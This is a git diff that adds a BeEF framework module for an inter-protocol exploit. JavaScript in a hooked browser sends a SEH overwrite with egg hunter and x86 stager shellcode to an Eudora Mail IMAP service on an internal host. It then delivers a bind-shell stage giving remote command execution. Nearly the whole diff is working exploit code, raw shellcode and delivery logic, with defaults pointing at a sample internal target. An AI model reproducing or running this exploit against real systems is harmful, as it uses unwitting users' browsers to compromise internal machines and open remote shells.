diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/command.js b/modules/exploits/beefbind/beef_bind_staged_deploy/command.js
new file mode 100755
index 000000000..e8a81727c
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/command.js
@@ -0,0 +1,396 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function () {
+ var rhost = '<%= @rhost %>';
+ var rport = '<%= @rport %>';
+ var service_port = '<%= @service_port %>';
+ var path = '<%= @path %>';
+ var delay = parseInt('<%= @delay %>');
+
+ var beef_host = '<%= @beef_host %>';
+ var beef_port = '<%= @beef_port %>';
+ var beef_junk_port = '<%= @beef_junk_port %>';
+ var sock_name = '<%= @beef_junk_socket %>';
+
+ //todo: this will be obviously dynamic as soon as we'll have more IPEC exploits.
+ var available_space = 769;
+
+ // base64 decode function that works properly with binary data (like shellcode)
+ var Base64Binary = {
+ _keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
+
+ decode:function (input) {
+ //get last chars to see if are valid
+ var lkey1 = this._keyStr.indexOf(input.charAt(input.length - 1));
+ var lkey2 = this._keyStr.indexOf(input.charAt(input.length - 1));
+
+ var bytes = Math.ceil((3 * input.length) / 4.0);
+ /**
+ if (lkey1 == 64) bytes--; //padding chars, so skip
+ if (lkey2 == 64) bytes--; //padding chars, so skip
+ **/
+
+ var uarray = [];
+ var chr1, chr2, chr3;
+ var enc1, enc2, enc3, enc4;
+ var i = 0;
+ var j = 0;
+
+ input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
+
+ for (i = 0; i < bytes; i += 3) {
+ //get the 3 octects in 4 ascii chars
+ enc1 = this._keyStr.indexOf(input.charAt(j++));
+ enc2 = this._keyStr.indexOf(input.charAt(j++));
+ enc3 = this._keyStr.indexOf(input.charAt(j++));
+ enc4 = this._keyStr.indexOf(input.charAt(j++));
+
+ chr1 = (enc1 << 2) | (enc2 >> 4);
+ chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
+ chr3 = ((enc3 & 3) << 6) | enc4;
+
+ uarray.push(chr1 & 0xff);
+ if (enc3 != 64) uarray.push(chr2 & 0xff);
+ if (enc4 != 64) uarray.push(chr3 & 0xff);
+ }
+ return uarray;
+ }
+ };
+
+
+ /*
+ * Ty's goodness. Slightly modified BeEF bind stager to work with the
+ * Egg Hunter.
+ *
+ * Original size: 299 bytes
+ * Final size: 326 bytes
+ * BadChars removed: \x00\x0a\x0d\x20\x7b
+ */
+ var stager = "B33FB33F" +
+ "\xba\x6a\x99\xf8\x25\xd9\xcc\xd9\x74\x24\xf4\x5e\x31\xc9" +
+ "\xb1\x4b\x83\xc6\x04\x31\x56\x11\x03\x56\x11\xe2\x9f\x65" +
+ "\x10\xac\x5f\x96\xe1\xcf\xd6\x73\xd0\xdd\x8c\xf0\x41\xd2" +
+ "\xc7\x55\x6a\x99\x85\x4d\xf9\xef\x01\x61\x4a\x45\x77\x4c" +
+ "\x4b\x6b\xb7\x02\x8f\xed\x4b\x59\xdc\xcd\x72\x92\x11\x0f" +
+ "\xb3\xcf\xda\x5d\x6c\x9b\x49\x72\x19\xd9\x51\x73\xcd\x55" +
+ "\xe9\x0b\x68\xa9\x9e\xa1\x73\xfa\x0f\xbd\x3b\xe2\x24\x99" +
+ "\x9b\x13\xe8\xf9\xe7\x5a\x85\xca\x9c\x5c\x4f\x03\x5d\x6f" +
+ "\xaf\xc8\x60\x5f\x22\x10\xa5\x58\xdd\x67\xdd\x9a\x60\x70" +
+ "\x26\xe0\xbe\xf5\xba\x42\x34\xad\x1e\x72\x99\x28\xd5\x78" +
+ "\x56\x3e\xb1\x9c\x69\x93\xca\x99\xe2\x12\x1c\x28\xb0\x30" +
+ "\xb8\x70\x62\x58\x99\xdc\xc5\x65\xf9\xb9\xba\xc3\x72\x2b" +
+ "\xae\x72\xd9\x24\x03\x49\xe1\xb4\x0b\xda\x92\x86\x94\x70" +
+ "\x3c\xab\x5d\x5f\xbb\xcc\x77\x27\x53\x33\x78\x58\x7a\xf0" +
+ "\x2c\x08\x14\xd1\x4c\xc3\xe4\xde\x98\x44\xb4\x70\x73\x25" +
+ "\x64\x31\x23\xcd\x6e\xbe\x1c\xed\x91\x14\x35\xdf\xb6\xc4" +
+ "\x52\x22\x48\xfa\xfe\xab\xae\x96\xee\xfd\x79\x0f\xcd\xd9" +
+ "\xb2\xa8\x2e\x08\xef\x61\xb9\x04\xe6\xb6\xc6\x94\x2d\x95" +
+ "\x6b\x3c\xa5\x6e\x60\xf9\xd4\x70\xad\xa9\x81\xe7\x3b\x38" +
+ "\xe0\x96\x3c\x11\x41\x58\xd3\x9a\xb5\x33\x93\xc9\xe6\xa9" +
+ "\x13\x86\x50\x8a\x47\xb3\x9f\x07\xee\xfd\x35\xa8\xa2\x51" +
+ "\x9e\xc0\x46\x8b\xe8\x4e\xb8\xfe\xbf\x18\x80\x97\xb8\x8b" +
+ "\xf3\x4d\x47\x15\x6f\x03\x23\x57\x1b\xd8\xed\x4c\x16\x5d" +
+ "\x37\x96\x26\x84";
+
+ /*
+ * Ty's goodness. Original BeEF bind stage.
+ *
+ * Original size: 792 bytes
+ */
+ var stage_allow_origin =
+ "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28" +
+ "\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52" +
+ "\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
+ "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38" +
+ "\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58" +
+ "\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a" +
+ "\x8b\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a\x40\x53\x53\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5" +
+ "\x89\xc6\x68\x01\x00\x00\x00\x68\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68\x00\x00\x00\x00\x89" +
+ "\xe3\x68\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c\x24\x0c\x57\x53\x51\x68\x3e\xcf" +
+ "\xaf\x0e\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00\x00" +
+ "\x8d\x7c\x24\x14\x57\x53\x51\x68\x3e\xcf\xaf\x0e\xff\xd5\x8b\x5c\x24\x08\x68\x00\x00\x00\x00" +
+ "\x68\x01\x00\x00\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x8b\x5c\x24\x04\x68\x00\x00\x00\x00\x68" +
+ "\x01\x00\x00\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x89\xf7\x68\x63\x6d\x64\x00\x89\xe3\xff\x74" +
+ "\x24\x10\xff\x74\x24\x14\xff\x74\x24\x0c\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c" +
+ "\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79" +
+ "\xcc\x3f\x86\xff\xd5\x89\xfe\xb9\xf8\x0f\x00\x00\x8d\x46\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d" +
+ "\xbe\x18\x04\x00\x00\xe8\x62\x00\x00\x00\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20" +
+ "\x4f\x4b\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74\x65\x78\x74\x2f" +
+ "\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73\x2d\x43\x6f\x6e\x74\x72\x6f\x6c\x2d\x41\x6c" +
+ "\x6c\x6f\x77\x2d\x4f\x72\x69\x67\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d" +
+ "\x4c\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x31\x36\x0d\x0a\x0d\x0a\x5e\xb9\x62\x00\x00\x00\xf3" +
+ "\xa4\x5e\x56\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90" +
+ "\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68" +
+ "\xea\x0f\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\xc2" +
+ "\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74\xec\x3b\xe1\xff" +
+ "\xd5\x57\x97\x68\x75\x6e\x4d\x61\xff\xd5\x81\xc4\xa0\x01\x00\x00\x5e\x89\x3e\x6a\x00\x68\x00" +
+ "\x04\x00\x00\x89\xf3\x81\xc3\x08\x00\x00\x00\x53\xff\x36\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x54" +
+ "\x24\x64\xb9\x00\x04\x00\x00\x81\x3b\x63\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb\xf2\x81\xc3" +
+ "\x03\x00\x00\x00\x43\x53\x68\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00\x57\x68\x01\x00\x00\x00" +
+ "\x53\x8b\x5c\x24\x70\x53\x68\x2d\x57\xae\x5b\xff\xd5\x5b\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00" +
+ "\x00\x68\x44\xf0\x35\xe0\xff\xd5\x31\xc0\x50\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24\x74\x8b" +
+ "\x1b\x53\x68\x18\xb7\x3c\xb3\xff\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85\xc0\x74\x3d\x68\x00\x00" +
+ "\x00\x00\x8d\xbe\x14\x04\x00\x00\x57\x68\x86\x0b\x00\x00\x8d\xbe\x7a\x04\x00\x00\x57\x8d\x5c" +
+ "\x24\x70\x8b\x1b\x53\x68\xad\x9e\x5f\xbb\xff\xd5\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18\x04" +
+ "\x00\x00\x57\xff\x36\x68\xc2\xeb\x38\x5f\xff\xd5\xff\x36\x68\xc6\x96\x87\x52\xff\xd5\xe9\x38" +
+ "\xfe\xff\xff";
+
+ // Skape's NtDisplayString egghunter technique, 32 bytes -> see also string T00W inside
+ /*
+ * Egg Hunter (Skape's NtDisplayString technique).
+ * Original size: 32 bytes
+ *
+ * Next SEH and SEH pointers
+ * Size: 8 bytes
+ */
+ var egg_hunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" +
+ "\xef\xb8\x42\x33\x33\x46\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";
+ var next_seh = "\xeb\x06\x90\x90";
+ var seh = "\x4e\x3b\x01\x10";
+
+
+ gen_nops = function(count){
+ var i = 0;
+ var result = "";
+ while(i < count ){ result += "\x90";i++;}
+ log("gen_nops: generated " + result.length + " nops.");
+ return result;
+ };
+
+ /*
+ * send_stager_back():
+ * In order to properly calculate the exact size of the cross-domain request headers,
+ * we send a bogus request back to BeEF (different port, so still cross-domain).
+ *
+ * get_junk_size():
+ * Then we retrieve the total size of the HTTP headers, as well as other specific headers like 'Host'
+ *
+ * calc_junk_size():
+ * Calculate the differences with the request that will be sent to the target, for example:
+ * "Host: 172.16.67.1:2000\r\n" //24 bytes
+ * "Host: 172.16.67.135:143\r\n" //25 bytes
+ */
+ send_stager_back = function(){
+ var uri = "http://" + beef_host + ":" + beef_junk_port + "/";
+ var xhr = new XMLHttpRequest();
+ xhr.open("POST", uri, true);
+ xhr.setRequestHeader("Content-Type", "text/plain");
+ xhr.setRequestHeader('Accept','*/*');
+ xhr.setRequestHeader("Accept-Language", "en");
+ xhr.send("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
+ log("send_stager_back: sending back the stager to calculate headers size");
+ };
+
+ var timeout_counter = 0;
+ var timeout = 10;
+ var size,host,contenttype,referer,nops = null;
+ get_junk_size = function(){
+ var junk_name = "";
+ var uri = "http://" + beef_host + ":" + beef_port + "/api/ipec/junk/" + sock_name;
+
+ $j.ajax({
+ type: "GET",
+ url: uri,
+ dataType: "json",
+ success: function(data, textStatus, xhr){
+ size = data.size;
+ host = data.host;
+ contenttype = data.contenttype;
+ referer = data.referer;
+
+ //todo to it better
+ nops = data.nops;
+
+ log("get_junk_size: OK - size [" + size + "] - host [" +
+ host + "] - contenttype [" + contenttype + "] - referer [" + referer + "]");
+ },
+ error: function(jqXHR, textStatus, errorThrown){
+ timeout_counter++;
+ // re-tries for 10 times (10 seconds)
+ if (timeout_counter < timeout) {
+ log("get_junk_size: ERROR - no data yet. re-trying.");
+ setTimeout(function() {get_junk_size()},1000);
+ }else{
+ log("get_junk_size: ERROR - timeout reached. giving up.");
+ }
+ }
+ });
+
+ };
+
+ var final_junk_size = null;
+ calc_junk_size = function(){
+
+ final_junk_size = size;
+ // 8 -> Host: \r\n
+ var new_host = (rhost+":"+service_port).length + 8;
+ if(new_host != host){
+
+ if(new_host > host){
+ var diff = new_host - host;
+ final_junk_size += diff;
+ }else{
+ var diff = host - new_host;
+ final_junk_size -= diff;
+ }
+ }
+ log("get_junk_size: final_junk_size -> [" + final_junk_size + "]");
+
+ //content-type "; charset=UTF-8" will not be present at the end, in the new request - we save 15 bytes
+ if(contenttype > 26)
+ final_junk_size -= 15;
+
+ // referrer should be the same
+ // we can also override the UserAgent (deliovering the Firefox Extension). We can then save 90 bytes or more.
+ log("get_junk_size: final_junk_size -> [" + final_junk_size + "]");
+ };
+
+ var stager_successfull = false;
+ send_stager = function(){
+
+ try{
+ xhr = new XMLHttpRequest();
+ var uri = "http://" + rhost + ":" + service_port + path;
+ log("send_stager: URI " + uri);
+ xhr.open("POST", uri, true);
+ xhr.setRequestHeader("Content-Type", "text/plain");
+
+ //todo: if for some reasons the headers are too big (bigger than 425 bytes),
+ // a warning should be displayed, because the exploit will not work, given the
+ // space for the shellcode that we have.
+ // The likelihood of this can be minimized thanks to the Firefox Extension we deliver
+ // to disable PortBanning. We are also overriding the UserAgent, so we save up to 100 bytes of space.
+
+ var junk = available_space - stager.length - final_junk_size; // 22 bytes
+ var junk_data = gen_nops(junk);
+
+ var payload = junk_data + stager + next_seh + seh + egg_hunter;
+ var decoded_payload = Base64Binary.decode(btoa(payload));
+
+ var c = "";
+ for (var i = 0; i < decoded_payload.length; i++) {
+ c += String.fromCharCode(decoded_payload[i] & 0xff);
+ }
+
+ //needed to have the service replying before sending the actual exploit
+ xhr.open("POST", uri, true);
+ xhr.setRequestHeader("Content-Type", "text/plain");
+ xhr.setRequestHeader('Accept','*/*');
+ xhr.setRequestHeader("Accept-Language", "en");
+ xhr.send("a001 LIST \r\n");
+ // / needed to have the service replying before sending the actual exploit
+
+ xhr.open("POST", uri, true);
+ xhr.setRequestHeader("Content-Type", "text/plain");
+ xhr.setRequestHeader('Accept','*/*');
+ xhr.setRequestHeader("Accept-Language", "en");
+
+ var post_body = "a001 LIST " + "}" + c + "}" + "\r\n";
+
+ log("send_stager: Final body length [" + post_body.length + "]");
+
+ // this is required only with WebKit browsers.
+ if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
+ console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
+ XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
+ function byteValue(x) {
+ return x.charCodeAt(0) & 0xff;
+ }
+ var ords = Array.prototype.map.call(datastr, byteValue);
+ var ui8a = new Uint8Array(ords);
+ this.send(ui8a.buffer);
+ }
+ }
+
+ xhr.sendAsBinary(post_body);
+ log("send_stager: stager sent.");
+ stager_successfull = true;
+ }catch(exception){
+ console.log("!!! Exception: " + exception);
+ // Check for PortBanning exceptions:
+ //NS_ERROR_PORT_ACCESS_NOT_ALLOWED: Establishing a connection to an unsafe or otherwise banned port was prohibited
+ if(exception.toString().indexOf('NS_ERROR_PORT_ACCESS_NOT_ALLOWED') != -1){
+ // not exactly needed but just in case
+ stager_successfull = false;
+ log("Error: NS_ERROR_PORT_ACCESS_NOT_ALLOWED. Looks like PortBanning for port [" + service_port + "] is still enabled!");
+ }
+ }
+
+ };
+
+ deploy_stage = function () {
+ if(stager_successfull){
+ // As soon as the stage is running, the HTTP responses will contain Access-Control-Allow-Origin: *
+ // so we can communicate with CORS normally.
+ var decoded_shellcode = Base64Binary.decode(btoa(stage_allow_origin));
+ var c = "";
+ for (var i = 0; i < decoded_shellcode.length; i++) {
+ c += String.fromCharCode(decoded_shellcode[i] & 0xff);
+ }
+ var post_body = "cmd=" + c;
+ var uri = "http://" + rhost + ":" + rport + path;
+
+ xhr = new XMLHttpRequest();
+ console.log("uri: " + uri);
+ xhr.open("POST", uri, true);
+ xhr.setRequestHeader("Content-Type", "text/plain");
+
+ // this is required only with WebKit browsers.
+ if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
+ console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
+ XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
+ function byteValue(x) {
+ return x.charCodeAt(0) & 0xff;
+ }
+ var ords = Array.prototype.map.call(datastr, byteValue);
+ var ui8a = new Uint8Array(ords);
+ this.send(ui8a.buffer);
+ }
+ }
+
+ xhr.sendAsBinary(post_body);
+ log("deploy_stage: stage sent.\r\n You should be now able to use beef_bind_shell module to send commands.");
+ }else{
+ log("Skipping Stage delivery because Stager failed.");
+ }
+
+ };
+
+ log = function(data){
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, data);
+ console.log(data);
+ };
+
+
+/*
+* To calculate exact HTTP header size we send a request back to BeEF, on a different socket, to maintain
+* the cross-domain behavior.
+*/
+send_stager_back();
+
+/*
+* Deliver Stager and Stage.
+*
+* The following timeouts should be enough with normal DSL lines.
+* Increase delay value for slower clients.
+*/
+setTimeout("get_junk_size()", delay/2);
+setTimeout("calc_junk_size()", delay);
+setTimeout("send_stager()", 2000 + delay);
+setTimeout("deploy_stage()", 6000 + delay);
+
+});
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/config.yaml b/modules/exploits/beefbind/beef_bind_staged_deploy/config.yaml
new file mode 100755
index 000000000..991d89bf0
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ BeEF_bind_staged_deploy:
+ enable: true
+ category: ["Exploits", "BeEF_bind"]
+ name: "BeEF bind"
+ description: "Pwn internal services with a custom staging shellcode. Both the stager and the stage are delivered.
Right now only Eudora Mail 3 (v. v6.1.19.0) on Windows (POP ECX mailcmn.dll) can be exploited: SEH exploit with EggHunter.
More exploits to come soon."
+ authors: ["antisnatchor", "tymiller"] # shellcode awesomeness -> Ty Miller
+ target:
+ working: ["FF"]
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb b/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb
new file mode 100755
index 000000000..9ca8c3bde
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/module.rb
@@ -0,0 +1,40 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Beef_bind_staged_deploy < BeEF::Core::Command
+
+ def self.options
+ configuration = BeEF::Core::Configuration.instance
+ beef_host = "#{configuration.get("beef.http.host")}"
+ beef_port = "#{configuration.get("beef.http.port")}"
+
+ return [
+ { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '172.16.67.135'},
+ { 'name' => 'service_port', 'ui_label' => 'Target Port', 'value' => '143'},
+ { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'},
+ { 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'},
+ { 'name' => 'delay', 'ui_label' => 'Add delay (ms)', 'value' => '4000'},
+ { 'name' => 'beef_host', 'ui_label' => 'BeEF Host', 'value' => beef_host},
+ { 'name' => 'beef_port', 'ui_label' => 'BeEF Port', 'value' => beef_port},
+ { 'name' => 'beef_junk_port', 'ui_label' => 'BeEF Junk Port', 'value' => '2000'},
+ { 'name' => 'beef_junk_socket', 'ui_label' => 'BeEF Junk Socket Name', 'value' => 'imapeudora1'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end